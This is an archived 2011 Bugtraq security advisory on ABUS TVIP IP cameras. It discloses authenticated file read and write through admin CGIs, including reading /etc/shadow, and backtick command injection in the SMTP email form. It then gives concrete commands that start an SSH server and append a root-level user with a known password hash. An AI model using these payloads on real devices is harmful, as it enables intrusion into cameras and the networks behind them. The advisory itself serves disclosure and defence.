lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <54337.5353b77c.1318048665.nsm@mail.stream-portal.org>
Date: Sat, 8 Oct 2011 06:37:45 +0200 (CEST)
From: "Marco van Berkum" <marco@...eam-portal.org>
To: Bugtraq@...urityfocus.com
Subject: 
 ABUS TVIP 11550/21550 Multiple vulnerabilities (and possibly other ABUS cams)

Title  : ABUS TVIP 11550/21550 Multiple vulnerabilities (and possibly
other ABUS cams)
Author : Marco van Berkum

- Summary
- Arbitrary file read
- Arbitrary file upload
- Arbitrary command excution (input validation bug)
- How it's totally compromised including ssh root login.

- Summary

The ABUS 11550 and 21550 are IP Webcams that can be configured via a
webinterface.
While experimenting multiple vulnerabilities where discovered that give
rootaccess
to the Operating System, debian-linux, of the camera. The webserver of the
camera is
BOA and runs as root.

Although these vulnerabilities can ONLY be exploited  when logged in as
admin, they
can still be considered critical since the camera can be used to gain
access to the
network behind it. I did not find a way past the login screen without
proper credentials (yet).

- Arbitrary file read

When logged in as admin its possible to read any file on the filesystem since
the webserver is running as root.

http://ipcamera/cgi-bin/admin/fileread?READ.filePath=/etc/shadow

- Arbitrary file upload

Similar to the fileread CGI there also is a filewrite CGI that can
(over)write any
file.

http://ipcamera/cgi-bin/admin/filewrite?SAVE.filePath=/tmp/file%26SAVE

- Arbitrary command execution (input validation bug)

The camera has several htmlforms to configure services such as a FTPclient
and
a SMTPclient. These are used to notify users and upload videos when the
camera's motion detection detects movement. These htmlforms can be used to
execute
arbitrary commands as root. I've found bugs in the SMTP and FTP forms but
probably
other forms will contain the same bug (unchecked).

Exploit:
In the configuration -> smtp general part is a webform where an
administrator's
emailadress can be filled out (Administrator e-Mail address).
The form lacks checking metacharacters such as ;, | and `.
When a test email from this form is sent the webinterface executes ssmtp -t
<your_input>.
So it is possible to 'break' the commandline by using `ls` for instance.
After
submitting
the command via the 'testbutton' this will be the output:

smtp: Connect to host

smtp: MAIL FROM:<backup>
   SMTP server error
 ................SMTP Test Failed...........

Which means we are situated in a directory that contains a backup directory.

`pwd` also works

smtp: Connect to host

smtp: MAIL FROM:</opt/cgi/admin>
   SMTP server error
 ................SMTP Test Failed...........

Unfortunately this only outputs the first line of the commandline output.
But, we can work around this :)

The system also contains a System Log function that shows output of the
systemlog.
Now, if we want a little more output than just the first line, for instance
"ls /" we can do it by filling out `ls /|logger` which sends the output
to the system logfile. Which can then be viewed from the webinterface.

Oct  8 14:35:15 <notice  > root: bin
Oct  8 14:35:15 <notice  > root: dev
Oct  8 14:35:15 <notice  > root: etc
Oct  8 14:35:15 <notice  > root: include
Oct  8 14:35:15 <notice  > root: init
Oct  8 14:35:15 <notice  > root: lib
Oct  8 14:35:15 <notice  > root: linuxrc
Oct  8 14:35:15 <notice  > root: mnt
Oct  8 14:35:15 <notice  > root: opt
Oct  8 14:35:15 <notice  > root: proc
Oct  8 14:35:15 <notice  > root: root
Oct  8 14:35:15 <notice  > root: sbin
Oct  8 14:35:15 <notice  > root: smtp_test.sh
Oct  8 14:35:15 <notice  > root: sys
Oct  8 14:35:15 <notice  > root: tag_replace.sh
Oct  8 14:35:15 <notice  > root: tmp
Oct  8 14:35:15 <notice  > root: usr
Oct  8 14:35:15 <notice  > root: var
Oct  8 14:35:15 <notice  > root: web

Getting the correct commandline output can also be obtained by redirecting
it to a readble file on de webserver itself by doing `ls -alR
/>/web/html/lsoutput.txt`
It can then be accessed by the url http://ipcamera/lsoutput.txt

- How it's totally compromised including ssh root login.

I did it in a few steps. First did a `ls -alR/>/web/html/lsoutput.txt` to
see what was on the filesystem and noticed that dropbear is available on the
system. Dropbear is a SSHserver/Client :)
So, I started it with the `/etc/dropbear/dropbear` command.

Then I took a look at the /etc/shadowfile and noticed that user root had
no password,
so ssh'ing in was not an option, yet. So had to create a user, did it the
following way:

`echo "test:x:0:0:test:/tmp:/bin/sh">>/etc/passwd`
and
`echo
"test:$1$/DqZS5Cm$PUeCTPpYIrGQnxsZtsfDY1:12963:0:99999:7:::">>/etc/shadow`

So, now we can login as user test with password test. User test has UID 0,
thus root.

test@...amera's password:
Welcome to

    _____    __      ___       __     ___       _     _    _
   |  ___|  /  \    / __ \    /  \   |  _ \    /  \   \ \ / /
   | |___  / /\ \  | /__\ \  / /\ \  | | \ |  / /\ \   \ V /
   |  ___|| |__| | |  _   / | |__| | | | | | | |__| |   \ /
   | |    |  __  | | |  \ \ |  __  | | |_/ / |  __  |   | |
   |_|    |_|  |_| |_|   \_\|_|  |_| |___ /  |_|  |_|   |_|

For further information check:
http://www.GM.com/



BusyBox v1.1.3 (2010.05.10-11:54+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

[test]#

Voila ;)

Also, its possible to mount a samba or nfsshare via the webinterface and
copy files
that way.

Just my two cents
Marco van berkum




Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ